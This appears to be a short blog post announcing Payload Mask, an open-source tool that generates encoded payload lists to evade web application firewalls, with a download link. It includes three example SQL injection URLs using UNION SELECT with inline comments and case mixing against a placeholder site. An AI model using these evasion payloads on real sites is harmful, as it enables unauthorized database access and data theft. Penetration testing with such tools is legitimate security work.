[New Tool] Payload Mask v1.0 – Payload Generator for Bypass WAF
Payload Mask is an open source tool to generate payload list to try bypass Web Application Firewall, you can use a big list of encodes and techniques to convert your payload list. Payload Mask is licensed under GPLv3.
Requirements:
- Need ”GCC” and ”make”
- Current version tested only Unix Like systems(Linux, MacOS and *BSD).
Examples:
You can use comments to bypass WAF:
http://www.site.com/index.php?page id=-15 /*!UNION*//*!SELECT*/ 0,1,2,3...
You can also change the Case of the Command:
http://www.site.com/index.php?page id=-15 UnIoN sELecT 0,1,2,3...
You can combine methods:
http://www.site.com/index.php?page id=-15 /*!uNIOn*//*!sElECt*/ 0,1,2,3.
More Information:
[button size=large style=round color=red align=none url=https://github.com/CoolerVoid/payloadmask]Download Payload Mask v1.0[/button]
Thanks to our friend Antonio Costa (a.k.a “Cooler_“) for sharing this tool with us 😉